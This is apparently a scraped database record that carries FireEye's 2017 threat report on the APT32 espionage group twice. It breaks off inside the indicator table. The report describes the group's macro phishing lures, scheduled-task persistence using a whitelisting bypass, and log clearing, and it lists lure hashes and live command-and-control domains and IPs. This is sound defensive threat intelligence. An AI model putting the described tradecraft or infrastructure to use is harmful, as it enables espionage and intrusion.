Infrastructure\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nChina\n\n| \n\nHospitality\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nUnited States\n\n| \n\nConsumer Products\n\n| WINDSHIELD \nPHOREAL \nBEACON \nSOUNDBITE \n \nTable 1: APT32 Private Sector Targeting Identified by FireEye\n\n#### APT32 Interest in Political Influence and Foreign Governments\n\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:\n\n * A [public blog published by the _Electronic Frontier Foundation_](<https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal>) indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\n * In 2014, APT32 leveraged a spear-phishing attachment titled \u201cPlans to crackdown on protesters at the Embassy of Vietnam.exe,\" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. Also in 2014, APT32 carried out an intrusion against a Western country\u2019s national legislature.\n * In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, [released a report](<http://blogs.360.cn/blog/oceanlotus-apt>) detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.\n * In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.\n * In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.\n\n#### APT32 Tactics\n\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\n\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had \u201c.doc\u201d file extensions, the recovered phishing lures were ActiveMime \u201c.mht\u201d web page archives that contained text and images. These files were likely created by exporting Word documents into single file web pages.\n\nTable 2 contains a sample of recovered APT32 multilingual lure files.\n\n**ActiveMime Lure Files**\n\n| \n\n**MD5** \n \n---|--- \n2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc \n(2017 Statistical Report on Staff Salary and Allowances) | \n\n5458a2e4d784abb1a1127263bd5006b5 \n \nThong tin.doc \n(Information) | \n\nce50e544430e7265a45fab5a1f31e529 \n \nPhan Vu Tutn CV.doc\n\n| \n\n4f761095ca51bfbbf4496a4964e41d4f \n \nKe hoach cuu tro nam 2017.doc \n(2017 Bailout Plan) | \n\ne9abe54162ba4572c770ab043f576784 \n \nInstructions to GSIS.doc\n\n| \n\nfba089444c769700e47c6b44c362f96b \n \nHoi thao truyen thong doc lap.doc \n(Traditional Games) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nGi\u1ea5y y\u00eau c\u1ea7u b\u1ed3i th\u01b0\u1eddng m\u1edbi 2016 - h\u1eb1ng.doc \n(New 2016 Claim Form) | \n\naa1f85de3e4d33f31b4f78968b29f175 \n \nHoa don chi tiet tien no.doc \n(Debt Details) | \n\n5180a8d9325a417f2d8066f9226a5154 \n \nThu moi tham du Hoi luan.doc \n(Collection of Participants) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nDanh sach nhan vien vi pham ky luat.doc \n(List of Employee Violations) | \n\n6baafffa7bf960dec821b627f9653e44 \n \nNo\u0323\u0302i-dung-qua\u0309ng-ca\u0301o.doc \n(Internal Content Advertising) | \n\n471a2e7341f2614b715dc89e803ffcac \n \nH\u0110 DVPM-VTC 31.03.17.doc\n\n| \n\nf1af6bb36cdf3cff768faee7919f0733 \n \nTable 2: Sampling of APT32 Lure Files\n\nThe Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.\n\nFigure 1: Example APT32 Phishing Lure \u2013 Fake Gmail Error Message\n\nFigure 2: Example APT32 Phishing Lure \u2013 Fake Text Encoding Error Message\n\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.\n\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.\n\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.\n\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\n\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\n\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.\n\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\n\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure \u201c2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc\u201d.\n\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\n\nIn this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s [\u201cSquiblydoo\u201d App Whitelisting bypass](<http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html>) every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the [Safebrowsing malleable C2 profile](<https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile>) to further blend in with network traffic. A second scheduled task named \u201cScheduled Defrags\u201d was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran \u201cmshta.exe\u201d every 50 minutes which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\n\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.\n\nFigure 5: APT32 Phishing Chain of Events\n\nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s [Invoke-Obfuscation](<https://github.com/danielbohannon/Invoke-Obfuscation>) framework.\n\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\n\n * During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.\n * In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.\n * APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code.\n\n#### APT32 Malware and Infrastructure\n\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess [backdoor development capabilities for macOS](<https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update>).\n\nThe capabilities for this unique suite of malware is shown in Table 3.\n\n**Malware**\n\n| \n\n**Capabilities** \n \n---|--- \n \nWINDSHIELD\n\n| \n\n * Command and control (C2) communications via TCP raw sockets\n * Four configured C2s and six configured ports \u2013 randomly-chosen C2/port for communications\n * Registry manipulation\n * Get the current module's file name\n * Gather system information including registry values, user name, computer name, and current code page\n * File system interaction including directory creation, file deletion, reading, and writing files\n * Load additional modules and execute code\n * Terminate processes\n * Anti-disassembly \n \nKOMPROGO\n\n| \n\n * Fully-featured backdoor capable of process, file, and registry management\n * Creating a reverse shell\n * File transfers\n * Running WMI queries\n * Retrieving information about the infected system \n \nSOUNDBITE\n\n| \n\n * C2 communications via DNS\n * Process creation\n * File upload\n * Shell command execution\n * File and directory enumeration/manipulation\n * Window enumeration\n * Registry manipulation\n * System information gathering \n \nPHOREAL\n\n| \n\n * C2 communications via ICMP\n * Reverse shell creation\n * Filesystem manipulation\n * Registry manipulation\n * Process creation\n * File upload \n \nBEACON (Cobalt Strike)\n\n| \n\n * Publicly available payload that can inject and execute arbitrary code into processes\n * Impersonating the security context of users\n * Importing Kerberos tickets\n * Uploading and downloading files\n * Executing shell commands\n * Configured with malleable C2 profiles to blend in with normal network traffic\n * Co-deployment and interoperability with Metasploit framework\n * SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB \n \nTable 3: APT32 Malware and Capabilities\n\nAPT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure. The [FireEye iSIGHT Intelligence MySIGHT Portal](<https://www.fireeye.com/products/isight-intelligence.html>) contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.\n\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\n\nFigure 6: APT32 Attack Lifecycle\n\n#### Outlook and Implications\n\nBased on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.\n\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\n\n#### APT32 Detection\n\nFigure 7 contains a Yara rule can be used to identify malicious macros associated with APT32\u2019s phishing lures:\n\nFigure 7: Yara Rule for APT32 Malicious Macros\n\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\n\n**C2 Infrastructure** \n \n--- \n \n103.53.197.202\n\n| \n\n104.237.218.70\n\n| \n\n104.237.218.72 \n \n185.157.79.3\n\n| \n\n193.169.245.78\n\n| \n\n193.169.245.137 \n \n23.227.196.210\n\n| \n\n24.datatimes.org\n\n| \n\n80.255.3.87 \n \nblog.docksugs.org\n\n| \n\nblog.panggin.org\n\n| \n\ncontay.deaftone.com \n \ncheck.paidprefund.org\n\n| \n\ndatatimes.org\n\n| \n\ndocksugs.org \n \neconomy.bloghop.org\n\n| \n\nemp.gapte.name\n\n| \n\nfacebook-cdn.net \n \ngap-facebook.com\n\n| \n\ngl-appspot.org\n\n| \n\nhelp.checkonl.org \n \nhigh.expbas.net\n\n| \n\nhigh.vphelp.net\n\n| \n\nicon.torrentart.com \n \nimages.chinabytes.info\n\n| \n\nimaps.qki6.com\n\n| \n\nimg.fanspeed.net \n \njob.supperpow.com\n\n| \n\nlighpress.info\n\n| \n\nmenmin.strezf.com \n \nmobile.pagmobiles.info\n\n| \n\nnews.lighpress.info\n\n| \n\nnotificeva.com \n \nnsquery.net\n\n| \n\npagmobiles.info\n\n| \n\npaidprefund.org \n \npush.relasign.org\n\n| \n\nrelasign.org\n\n| \n\nshare.codehao.net \n \nseri.volveri.net\n\n| \n\nssl.zin0.com\n\n| \n\nstatic.jg7.org \n \nsyn.timeizu.net\n\n| \n\nteriava.com\n\n| \n\ntimeizu.net \n \ntonholding.com\n\n| \n\ntulationeva.com\n\n| \n\nuntitled.po9z.com \n \nupdate-flashs.com\n\n| \n\nvieweva.com\n\n| \n\nvolveri.net \n \nvphelp.net\n\n| \n\nyii.yiihao126.net\n\n| \n\nzone.apize.net \n \nTable 4: Sampling of APT32 C2 Infrastructure\n", "modified": "2017-05-14T18:00:00", "published": "2017-05-14T18:00:00", "id": "FIREEYE:8B4453AF3FA94076D63CCBDB94AFC782", "href": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "type": "fireeye", "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "description": "Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\n\n#### APT32 and FireEye\u2019s Community Response\n\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye\u2019s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a [Community Protection Event (CPE)](<https://www2.fireeye.com/WEB-Community-Protection-Security-Numbers.html>) \u2013 a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering \u2013 to protect all clients from APT32 activity.\n\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures. This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32.\n\n#### APT32 Targeting of Private Sector Company Operations in Southeast Asia\n\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.\n\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\n\n * In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.\n * In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. \n * In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.\n * From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.\n\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\n\n**Year**\n\n| \n\n**Country**\n\n| \n\n**Industry**\n\n| \n\n**Malware** \n \n---|---|---|--- \n \n2014\n\n| \n\nVietnam\n\n| \n\nNetwork Security\n\n| \n\nWINDSHIELD \n \n2014\n\n| \n\nGermany\n\n| \n\nManufacturing\n\n| \n\nWINDSHIELD \n \n2015\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nConsumer products\n\n| KOMPROGO \nWINDSHIELD \nSOUNDBITE \nBEACON \n \n \n2016\n\n| \n\nVietnam\n\n| \n\nBanking\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nTechnology Infrastructure\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nChina\n\n| \n\nHospitality\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nUnited States\n\n| \n\nConsumer Products\n\n| WINDSHIELD \nPHOREAL \nBEACON \nSOUNDBITE \n \nTable 1: APT32 Private Sector Targeting Identified by FireEye\n\n#### APT32 Interest in Political Influence and Foreign Governments\n\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:\n\n * A [public blog published by the _Electronic Frontier Foundation_](<https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal>) indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\n * In 2014, APT32 leveraged a spear-phishing attachment titled \u201cPlans to crackdown on protesters at the Embassy of Vietnam.exe,\" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. Also in 2014, APT32 carried out an intrusion against a Western country\u2019s national legislature.\n * In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, [released a report](<http://blogs.360.cn/blog/oceanlotus-apt>) detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.\n * In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.\n * In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.\n\n#### APT32 Tactics\n\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\n\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had \u201c.doc\u201d file extensions, the recovered phishing lures were ActiveMime \u201c.mht\u201d web page archives that contained text and images. These files were likely created by exporting Word documents into single file web pages.\n\nTable 2 contains a sample of recovered APT32 multilingual lure files.\n\n**ActiveMime Lure Files**\n\n| \n\n**MD5** \n \n---|--- \n2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc \n(2017 Statistical Report on Staff Salary and Allowances) | \n\n5458a2e4d784abb1a1127263bd5006b5 \n \nThong tin.doc \n(Information) | \n\nce50e544430e7265a45fab5a1f31e529 \n \nPhan Vu Tutn CV.doc\n\n| \n\n4f761095ca51bfbbf4496a4964e41d4f \n \nKe hoach cuu tro nam 2017.doc \n(2017 Bailout Plan) | \n\ne9abe54162ba4572c770ab043f576784 \n \nInstructions to GSIS.doc\n\n| \n\nfba089444c769700e47c6b44c362f96b \n \nHoi thao truyen thong doc lap.doc \n(Traditional Games) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nGi\u1ea5y y\u00eau c\u1ea7u b\u1ed3i th\u01b0\u1eddng m\u1edbi 2016 - h\u1eb1ng.doc \n(New 2016 Claim Form) | \n\naa1f85de3e4d33f31b4f78968b29f175 \n \nHoa don chi tiet tien no.doc \n(Debt Details) | \n\n5180a8d9325a417f2d8066f9226a5154 \n \nThu moi tham du Hoi luan.doc \n(Collection of Participants) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nDanh sach nhan vien vi pham ky luat.doc \n(List of Employee Violations) | \n\n6baafffa7bf960dec821b627f9653e44 \n \nNo\u0323\u0302i-dung-qua\u0309ng-ca\u0301o.doc \n(Internal Content Advertising) | \n\n471a2e7341f2614b715dc89e803ffcac \n \nH\u0110 DVPM-VTC 31.03.17.doc\n\n| \n\nf1af6bb36cdf3cff768faee7919f0733 \n \nTable 2: Sampling of APT32 Lure Files\n\nThe Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.\n\nFigure 1: Example APT32 Phishing Lure \u2013 Fake Gmail Error Message\n\nFigure 2: Example APT32 Phishing Lure \u2013 Fake Text Encoding Error Message\n\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.\n\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.\n\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.\n\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\n\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\n\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.\n\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\n\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure \u201c2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc\u201d.\n\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\n\nIn this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s [\u201cSquiblydoo\u201d App Whitelisting bypass](<http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html>) every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the [Safebrowsing malleable C2 profile](<https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile>) to further blend in with network traffic. A second scheduled task named \u201cScheduled Defrags\u201d was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran \u201cmshta.exe\u201d every 50 minutes which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\n\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.\n\nFigure 5: APT32 Phishing Chain of Events\n\nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s [Invoke-Obfuscation](<https://github.com/danielbohannon/Invoke-Obfuscation>) framework.\n\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\n\n * During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.\n * In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.\n * APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code.\n\n#### APT32 Malware and Infrastructure\n\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess [backdoor development capabilities for macOS](<https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update>).\n\nThe capabilities for this unique suite of malware is shown in Table 3.\n\n**Malware**\n\n| \n\n**Capabilities** \n \n---|--- \n \nWINDSHIELD\n\n| \n\n * Command and control (C2) communications via TCP raw sockets\n * Four configured C2s and six configured ports \u2013 randomly-chosen C2/port for communications\n * Registry manipulation\n * Get the current module's file name\n * Gather system information including registry values, user name, computer name, and current code page\n * File system interaction including directory creation, file deletion, reading, and writing files\n * Load additional modules and execute code\n * Terminate processes\n * Anti-disassembly \n \nKOMPROGO\n\n| \n\n * Fully-featured backdoor capable of process, file, and registry management\n * Creating a reverse shell\n * File transfers\n * Running WMI queries\n * Retrieving information about the infected system \n \nSOUNDBITE\n\n| \n\n * C2 communications via DNS\n * Process creation\n * File upload\n * Shell command execution\n * File and directory enumeration/manipulation\n * Window enumeration\n * Registry manipulation\n * System information gathering \n \nPHOREAL\n\n| \n\n * C2 communications via ICMP\n * Reverse shell creation\n * Filesystem manipulation\n * Registry manipulation\n * Process creation\n * File upload \n \nBEACON (Cobalt Strike)\n\n| \n\n * Publicly available payload that can inject and execute arbitrary code into processes\n * Impersonating the security context of users\n * Importing Kerberos tickets\n * Uploading and downloading files\n * Executing shell commands\n * Configured with malleable C2 profiles to blend in with normal network traffic\n * Co-deployment and interoperability with Metasploit framework\n * SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB \n \nTable 3: APT32 Malware and Capabilities\n\nAPT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure. The [FireEye iSIGHT Intelligence MySIGHT Portal](<https://www.fireeye.com/products/isight-intelligence.html>) contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.\n\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\n\nFigure 6: APT32 Attack Lifecycle\n\n#### Outlook and Implications\n\nBased on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.\n\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\n\n#### APT32 Detection\n\nFigure 7 contains a Yara rule can be used to identify malicious macros associated with APT32\u2019s phishing lures:\n\nFigure 7: Yara Rule for APT32 Malicious Macros\n\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\n\n**C2 Infrastructure** \n \n--- \n \n103.53.197.202\n\n| \n\n104.237.218.70\n\n| \n\n104.237.218.72 \n \n185.157.79.3\n\n| \n\n193.169.245.78\n\n| \n\n193.169.245.137 \n \n23.227.196.210\n\n| \n\n24.datatimes.org\n\n| \n\n80.255.3.87 \n \nblog.docksugs.org\n\n| \n\nblog.panggin.org\n\n| \n\ncontay.deaftone.com \n \ncheck.paidprefund.org\n\n| \n\ndatatimes.org\n\n| \n\ndocksugs.org \n \neconomy.bloghop.org\n\n| \n\nemp.gapte.name\n\n| \n\nfacebook-cdn.net \n \ngap-facebook.com\n\n| \n\ngl-appspot.org\n\n| \n\nhelp.checkonl.org \n \nhigh.expbas.net\n\n| \n\nhigh.vphelp.net\n\n| \n\nicon.torrentart.com \n \nimages.chinabytes.info\n\n| \n\nimaps.qki6.com\n\n| \n\nimg.fanspeed.net \n \njob.supperpow.com\n\n| \n\nlighpress.info\n\n| \n\nmenmin.strezf.com \n \nmobile.pagmobiles.info\n\n| \n\nnews.lighpress.info\n\n| \n\nnotificeva.com \n \nnsquery.net\n\n| \n\npagmobiles.info\n\n| \n\npaidprefund.org \n \npush.relasign.org\n\n| \n\nrelasign.org\n\n| \n\nshare.codehao.net \n \nseri.volveri.net\n\n| 